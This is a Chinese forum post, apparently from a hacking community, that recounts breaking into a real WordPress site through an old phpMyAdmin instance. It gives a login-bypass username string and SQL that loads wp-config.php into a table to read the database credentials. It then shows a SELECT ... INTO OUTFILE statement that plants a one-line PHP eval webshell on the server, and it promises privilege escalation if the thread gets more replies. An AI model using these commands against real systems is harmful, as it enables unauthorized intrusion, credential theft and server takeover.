轻音
xxxx.xxx/phpmyadmin/(pa度娘)
可以使用万能密码进入 低版本的phpmyadmin存在此漏洞
利用方法:用户名处写入‘localhost’@'@”则登录成功。 (注意全部是英文标点符号,最后一个为英文双引号)
直接写马?想都别想!!!
万能密码进入的一般权限都是非常低,但是却有读文件的权限。
为什么要读文件?找到网站配置文件,说不定当前网站的数据库用户有权限写马。
如果不能写马,也可以看到后台用户,进入后台拿shell。
现在就是想办法搞绝对路径了
刚要开始找吧友跟我说他有绝对路径这就简单多了 - -
如果没有绝对路径,一般也是可以读取配置文件什么的获取到
或者phpmyadmin报错啊什么的
c:\xampp\htdocs\wavegoing\ 网站绝对路径
c:\xampp\phpmyadmin\ phpmyadmin路径
在扫目录的时候,我发现了网站使用的是WordPress程序
WordPress的配置文件是在wp-config.php
那么我就要读取这个文件的内容
c:\xampp\htdocs\wavegoing\wp-config.php
读文件语句select load_file('c:\xampp\htdocs\wavegoing\wp-config.php');
直接读文件是空的,我也不知道是为什么,但是好几回phpmyadmin拿shell,直接读文件都是这样子。
另外一个思路。Mysql可以把指定的文件写进表
CREATE TABLE `test`.`a` (`a1` TEXT NOT NULL ); //在test这个库创建一个表名为a字段名为a1的表。
load data local infile 'c:\xampp\htdocs\wavegoing\wp-config.php'into table a; //把c:\xampp\htdocs\wavegoing\wp-config.php写入到表名为a的表
可以看到斜杠被去掉了那就这样写路径
load data local infile 'c:\\xampp\\htdocs\\wavegoing\\wp-config.php'into table a;
成功写入
去查看一下内容。
为什么会出现这个?好吧我也不知道,我也没学过数据库啊!!!
尝试导出到本地查看。选择text格式
看来我人品还是相当滴好啊
root用户
使用root登录,执行sql语句
select '<?php @eval($_POST[1])?>'INTO OUTFILE 'c:\\xampp\\phpmyadmin\\c.php'
期间遇到的就是网站绝对路径写php一直写入失败txt却可以
所以我换成了phpmyadmin的路径,写入成功。
最近渗透吧不太活跃,实战文章也是越来越少。此贴上30楼继续提权
就这样吧希望大家不要搞破坏。
给你一个滑稽
